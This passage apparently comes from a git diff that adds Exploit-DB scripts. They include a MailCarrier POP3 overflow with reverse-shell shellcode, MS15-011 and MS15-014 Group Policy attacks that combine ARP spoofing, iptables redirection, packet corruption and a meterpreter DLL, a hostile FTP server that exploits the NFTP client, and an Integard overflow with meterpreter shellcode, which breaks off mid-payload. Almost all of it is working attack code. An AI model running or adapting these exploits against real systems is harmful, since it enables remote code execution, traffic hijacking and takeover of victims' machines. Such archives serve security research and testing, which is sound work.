+# Note: Every version of Windows 10 has a different offset  and sometimes you need to run the exploit twice before you can pop a shell ¯\_(ツ)_/¯
+
+#!/usr/bin/python
+
+import sys
+import socket
+import time
+
+#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISTENING_PORT -b '\x00\xd9' -f python
+
+buf =  ""
+buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
+buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
+buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
+buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
+buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
+buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
+buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
+buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
+buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
+buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
+buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
+buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
+buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
+buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
+buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
+buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
+buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
+buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
+buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
+buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
+buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
+buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
+buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
+buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
+buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
+buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
+buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
+buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
+buf += "\x32\xb4\xfe\x5c"
+
+jmpesp = '\x23\x49\xA1\x0F'
+
+#buffer = '\x41' * 5093  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5093  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+buffer = '\x41' * 5095  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5097  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5099  + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+
+print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("TARGET", 110))
+print s.recv(1024)
+s.send('USER ' + buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"
\ No newline at end of file
diff --git a/exploits/windows/remote/47558.py b/exploits/windows/remote/47558.py
new file mode 100755
index 000000000..644d62777
--- /dev/null
+++ b/exploits/windows/remote/47558.py
@@ -0,0 +1,152 @@
+# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
+# Date: 2019-10-28
+# Exploit Author: Thomas Zuk
+# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, 
+# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
+# Tested on: Windows 7 , Windows Server 2012
+# CVE : CVE-2015-0008
+# Type: Remote
+# Platform: Windows
+
+# Description: While there exists multiple advisories for the vulnerability and video demos of 
+# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code 
+# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level 
+# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).
+
+#!/usr/bin/python3
+
+import argparse
+import os
+import subprocess
+import socket
+import fcntl
+import struct
+
+# MS15-011 Exploit.
+# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
+# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
+# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
+# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
+
+def arpSpoof(interface, hostIP, targetIP):
+    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
+    arpArgs = arpCmd.split()
+    print("Arpspoofing: %s" % (arpArgs))
+    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+
+    
+def karmaSMB(hostIP):
+    print("reverting GptTmpl.inf from bak")
+    os.system("cp GptTmpl.inf.bak GptTmpl.inf")
+    appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
+    CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
+    f = open("GptTmpl.inf","a", encoding='utf-16le')
+    f.write(appInit)
+    f.write(CURunKey)
+    f.close()
+    
+    path = os.getcwd()
+    
+    fConfig = open("smb.conf","w")
+    fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
+    fConfig.close()
+
+    karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
+    os.system(karmaCmd)
+
+
+def iptables_config(targetIP, hostIP):
+    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
+    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
+    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
+    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')
+
+
+def get_interface_address(ifname):
+    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
+
+def generatePayload(lhost, lport):
+    print("generating payload(s) and metasploit resource file")
+    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
+    os.system(msfDll)
+    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
+    print("metasploit resource script: %s" % msfResource)
+    print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
+    
+    file = open("meta_resource.rc", "w+")
+    file.write(msfResource)
+    file.close()
+        
+
+
+if __name__ == '__main__':
+
+    parser = argparse.ArgumentParser()
+
+    # Add arguments
+    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
+    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
+    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
+    parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
+    parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)
+
+    args = parser.parse_args()
+
+    # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
+    print ("checking for missing file(s)")
+    if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
+        print("Requirements missing. Downloading required files from github")
+        os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
+        os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")
+
+    # Get the provided interfaces IP address
+    ipAddr = get_interface_address(args.interface)
+
+    if args.lhost is not None:
+        lhost = args.lhost
+    else:
+        lhost = ipAddr
+
+    if args.lport is not None:
+        lport = args.lport
+    else:
+        lport = '4444'
+    
+
+    dcSpoof = ""
+    dcCommaList = ""
+    count = 0
+  
+    # loop over the domain controllers, poison each and target the host IP
+    # create a comma separated list of DC's
+    # create a "-t" separate list of DC's for use with arpspoof
+    for dc in args.domain_controller:
+        dcSpoof += "-t %s " % (dc)
+        if count > 0: 
+            dcCommaList += ",%s" % (dc)
+        else:
+            dcCommaList += "%s" % (dc)
+
+        arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
+        count += 1
+
+    # arpspoof the target and all of the DC's
+    arpSpoof(args.interface, args.target_ip, dcSpoof)
+
+    # generate payloads
+    generatePayload(lhost, lport)
+
+    # Setup iptables forwarding rules
+    iptables_config(args.target_ip, ipAddr)
+
+    #run Karmba SMB Server
+    karmaSMB(ipAddr)
+   
+    
+    print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
+    print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")
\ No newline at end of file
diff --git a/exploits/windows/remote/47559.py b/exploits/windows/remote/47559.py
new file mode 100755
index 000000000..5ed94a808
--- /dev/null
+++ b/exploits/windows/remote/47559.py
@@ -0,0 +1,125 @@
+# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
+# Date: 2019-10-28
+# Exploit Author: Thomas Zuk
+# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, 
+# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
+# Tested on: Windows 7 , Windows Server 2012
+# CVE : CVE-2015-0009
+# Type: Remote
+# Platform: Windows
+
+# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes 
+# the target system to revert various security settings to their default settings. This includes SMB server 
+# and network client settings, which by default do not require SMB signing except for domain controllers. 
+# Successful exploitation against a system with a hardened configuration that requires SMB Signing by the 
+# network client will make the target system vulnerable to MS15-011, which can lead to remote code execution.
+
+#!/usr/bin/python3
+
+import argparse
+import fcntl
+import os
+import socket
+import struct
+import subprocess
+from subprocess import PIPE
+import re
+
+# MS15-014 Exploit.
+# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-014
+# Example usage: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
+# Example usage with multiple DC's: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
+# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
+
+def arpSpoof(interface, hostIP, targetIP):
+    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
+    arpArgs = arpCmd.split()
+    print("Arpspoofing: %s" % (arpArgs))
+    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+
+
+def corrupt_packet():
+    global count
+    
+    # NetSed listen port 446 (iptables redirected), modify traffic, then forward to destination 445.
+    netsedCmd = "netsed tcp 446 0 445 s/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00%00" #>/dev/null 2>&1 &
+    netsedArgs = netsedCmd.split()
+    print("Starting NetSed!")
+    print("NetSed: %s" % (netsedArgs))
+    netsedP = subprocess.Popen(netsedArgs, stdout=PIPE, stderr=subprocess.STDOUT)
+    
+    
+    while True:
+        o = (netsedP.stdout.readline()).decode('utf-8')
+        
+        if o != '':
+            if args['verbose']:
+                print("NetSed output: %s" % o)
+
+            if re.search('Applying rule', o) is not None:
+                count += 1
+                print('packet corrupted: % s' % count)
+                # During testing, after 4 attempts to retrieve GptTmpl.inf the exploit was successful. Sometimes the machine requested the file 7 times, but exploitation was always successful after 4 attempts.
+                # The script waits for up to 7 for reliability. Tested on Windows 7 SP1 and Server 2012 R2
+                if count == 4:
+                    print("Exploit has likely completed!! waiting for up to 7 corrupted packets for reliability. \nIf no more packets are corrupted in the next couple of minutes kill this script. The target should be reverted to default settings with SMB signing not required on the client. \nTarget can now be exploited with MS15-011 exploit.")
+                
+        #During testing, after 7 attempts to retrieve GptTmpl.inf the GPO update stopped and exploitation was successful.
+        if count == 7:
+            break
+    
+
+def get_interface_address(ifname):
+    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
+
+def iptables_config(targetIP, hostIP):
+    #allow forwarding, redirect arpspoofed traffic from dport 445 to 446 for NetSed.
+    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
+    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
+    print('[+] Make sure to cleanup iptables after exploit completes')
+    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
+    os.system('iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
+
+if __name__ == '__main__':
+
+    parser = argparse.ArgumentParser(description='Find the SecEdit\GptTmpl.inf UUID to exploit MS15-014')
+    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-014", required=True)
+    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
+    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
+    parser.add_argument("-v", "--verbose", help="Toggle verbose mode. displays all output of NetSed, very busy terminal if enabled.", action='store_true')
+
+    args = vars(parser.parse_args())
+    
+    target_ip = args['target_ip']
+
+    count = 0
+    
+    # Get the provided interfaces IP address
+    ipAddr = get_interface_address(args['interface'])
+
+    dcSpoof = ""
+    dcCommaList = ""
+    dcCount = 0
+    
+    # loop over the domain controllers, poison each and target the host IP
+    # create a comma separated list of DC's
+    # create a "-t" separate list of DC's for use with arpspoof
+    for dc in args['domain_controller']:
+        dcSpoof += "-t %s " % (dc)
+        if dcCount > 0: 
+            dcCommaList += ",%s" % (dc)
+        else:
+            dcCommaList += "%s" % (dc)
+
+        arpSpoof(args['interface'], dc, "-t %s" % (target_ip))
+        dcCount += 1
+
+    # arpspoof the target and all of the DC's
+    arpSpoof(args['interface'], target_ip, dcSpoof)
+
+    # Setup iptables forwarding rules
+    iptables_config(target_ip, ipAddr)
+
+    #identify requests for GptTmpl.inf and modify the packet to corrupt it using NetSed.
+    corrupt_packet()
\ No newline at end of file
diff --git a/exploits/windows/remote/47576.py b/exploits/windows/remote/47576.py
new file mode 100755
index 000000000..d8ab0a098
--- /dev/null
+++ b/exploits/windows/remote/47576.py
@@ -0,0 +1,176 @@
+# Exploit Title: Ayukov NFTP client 1.71 -  'SYST' Buffer Overflow
+# Date: 2019-11-03
+# Exploit Author: Chase Hatch (SYANiDE)
+# Vendor Homepage: http://ayukov.com/nftp/
+# Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
+# Version: 1.71
+# Tested on: Windows XP Pro SP0, SP1, SP2, SP3
+# CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
+# Steps to reproduce:
+# Run the server with the valid Windows version
+# Connect the client to the malicious server
+# bind shell on port 5150
+
+#!/usr/bin/env python2
+import os, sys, socket
+
+NARGS = len(sys.argv)
+
+# ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
+# kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
+# 7C923A95   FFD6  CALL ESI  	# Windows XP Pro SP3; ntdll.dll
+# 7C927543   FFD6  CALL ESI		# Windows XP Pro SP2; ntdll.dll
+# 77E641C7   FFE6  JMP ESI		# Windows XP Pro SP1; kernel32.dll
+# 77E667F3   FFE6  JMP ESI		# Windows XP Pro SP0: kernel32.dll
+tourRETs = {
+	"XPProSP3": "\x95\x3A\x92\x7c",
+	"XPProSP2": "\x43\x75\x92\x7C",
+	"XPProSP1": "\xc7\x41\xe6\x77",
+	"XPProSP0": "\xf3\x67\xe6\x77"
+}
+
+
+if not NARGS > 1:
+	print("USAGE: %s version" % sys.argv[0])
+	print("[.] version must be in:")
+	for item in tourRETs:
+		print("\t%s" % item)
+	sys.exit(1)
+
+
+# sploit = "A"*5000  # crash!  in SYST cmd, 41414141 in EIP and EBP
+# ESP and ESI both pointers to somewhere in the As
+#  If I increase the overflow string to 10000, the area ESP points to at crash
+#, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
+# sploit = "A"*10000
+# sploit = sys.argv[1]  # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
+# `locate pattern_offset.rb |head -n 1` 46326846 10000  # 4116
+sploit = "A"*4116
+
+# Add the return address
+try:
+	sploit +=  tourRETs[sys.argv[1]]
+except KeyError, x:
+	print("[!] Version %s: not a valid version!  Possibly bad capitalization" % str(x))
+	sys.exit(1)
+
+sploit += ("\x90"*12)  # original calcs based on RET*4... oops. realign.
+
+# echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc  # 0x69D (1693); ESP-ESI
+sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
+
+
+# badchars = "\x00\x0a\x0d"
+# locate EIP and align ESP to a close future 4 and 16 byte boundary
+NOTES = """\
+$-37     > D9EE             FLDZ
+$-35     > D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
+$-31     > 59               POP ECX
+$-30     > 80C1 09          ADD CL,9
+$-2D     > 80C1 04          ADD CL,4
+$-2A     > 80C1 2A          ADD CL,2A
+$-27     > 80C5 01          ADD CH,1
+$-24     > 51               PUSH ECX
+$-23     > 5C               POP ESP
+"""
+sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
+sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
+sploit += "\x90" * 0x22  # ESP = EIP
+sploit += "\x90" * 20  # sled for shikata_ga_nai unpack
+
+# msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process 
+# -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
+sploit += (
+"\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
+"\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1"
+"\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57"
+"\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56"
+"\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79"
+"\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3"
+"\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa"
+"\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9"
+"\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82"
+"\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05"
+"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
+"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
+"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
+"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
+"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
+"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
+"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
+"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
+"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
+"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
+"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
+"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
+"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
+"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
+) # 355
+sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
+
+
+cases = {
+	"USER": "331 user OK. Pass required",
+	"PASS": "230 OK, current directory is /",
+	# "SYST": "215 UNIX Type: L8",
+
+	"SYST": sploit,		# CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
+
+	"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
+	"SITE UMASK": "500 SITE UMASK is an unknown extension",
+	"CWD": "250 OK, current directory whatever you think it is",
+	"PORT": "200 PORT command successful",
+	"PASV": "227 Entering PASV mode",
+	"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
+}
+
+
+sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sx.bind(("192.168.56.181",21))
+sx.listen(5)
+print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
+cx,addr = sx.accept()
+print("[!] Connection received from %s" % str(addr))
+cx.send("220 HostileFTPd v0.0 alpha !\r\n")
+notified = 0
+while True:	
+	req = cx.recv(1024)
+	for key, resp in cases.items():
+		if key in req:
+			cx.send(resp + "\r\n")
+		if "SITE UMASK" in req and notified == 0:
+			print("[!]  Buffer sent.  Bind shell on client's port 5150?")
+			notified = 1
+		if "PASV" in req:
+			justpause = raw_input("[.] PASV received.  Pausing recv buffer")
+
+
+NOTES="""\
+### followed TCP stream in normal client connect to ftp server
+220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
+220-You are user number 1 of 50 allowed.
+220-Local time is now 13:47. Server port: 21.
+220-This is a private system - No anonymous login
+220-IPv6 connections are also welcome on this server.
+220 You will be disconnected after 15 minutes of inactivity.
+USER bozo
+331 User bozo OK. Password required
+PASS theclown
+230-User bozo has group access to:  1003      
+230 OK. Current directory is /
+SYST
+215 UNIX Type: L8
+TYPE I
+200 TYPE is now 8-bit binary
+SITE UMASK 022
+500 SITE UMASK is an unknown extension
+CWD /
+250 OK. Current directory is /
+PASV
+227 Entering Passive Mode (192,168,56,181,183,29)
+LIST -a
+150 Accepted data connection
+226-ASCII
+226-Options: -a -l 
+226 3 matches total
+"""
\ No newline at end of file
diff --git a/exploits/windows/remote/47750.py b/exploits/windows/remote/47750.py
new file mode 100755
index 000000000..c0a1994b4
--- /dev/null
+++ b/exploits/windows/remote/47750.py
@@ -0,0 +1,148 @@
+Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
+Date: 2019-09-22
+Exploit Author: purpl3f0xsecur1ty
+Vendor Homepage: https://www.tucows.com/
+Software Link: http://www.tucows.com/preview/519612/Integard-Home
+Version: Pro 2.2.0.9026 / Home 2.0.0.9021
+Tested on: Windows XP / Win7 / Win10
+CVE: CVE-2019-16702
+
+#!/usr/bin/python
+########################################################
+#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
+#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
+# The vulnerability: Integard fails to sanitize input  #
+# to the "NoJs" parameter in an HTTP POST request,     #
+# resulting in a stack buffer overflow that overwrites #
+# the instruction pointer, leading to remote code      #
+# execution.                                           #
+########################################################
+
+import socket
+import os
+import sys
+from struct import pack
+
+def main():
+    print "~*Integard RCE Exploit for XP/7/10*~"
+    print "Chose target: (Enter number only)"
+    print "1)  -  Windows XP"
+    print "2)  -  Windows 7/10"
+    target = str(input())
+    host = "10.0.0.130"
+    port = 18881
+
+    ####################################################
+    # Integard's functionality interferes with reverse #
+    # and bind shells. Only Meterpreter seems to work. #
+    ####################################################
+
+    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
+    # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread
+    meterpreter =  "\x90" * 50
+    meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4"
+    meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15"
+    meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80"
+    meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e"
+    meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a"
+    meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84"
+    meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27"
+    meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66"
+    meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44"
+    meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86"
+    meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc"
+    meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43"
+    meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06"
+    meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc"
+    meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f"
+    meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab"
+    meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b"
+    meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02"
+    meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85"
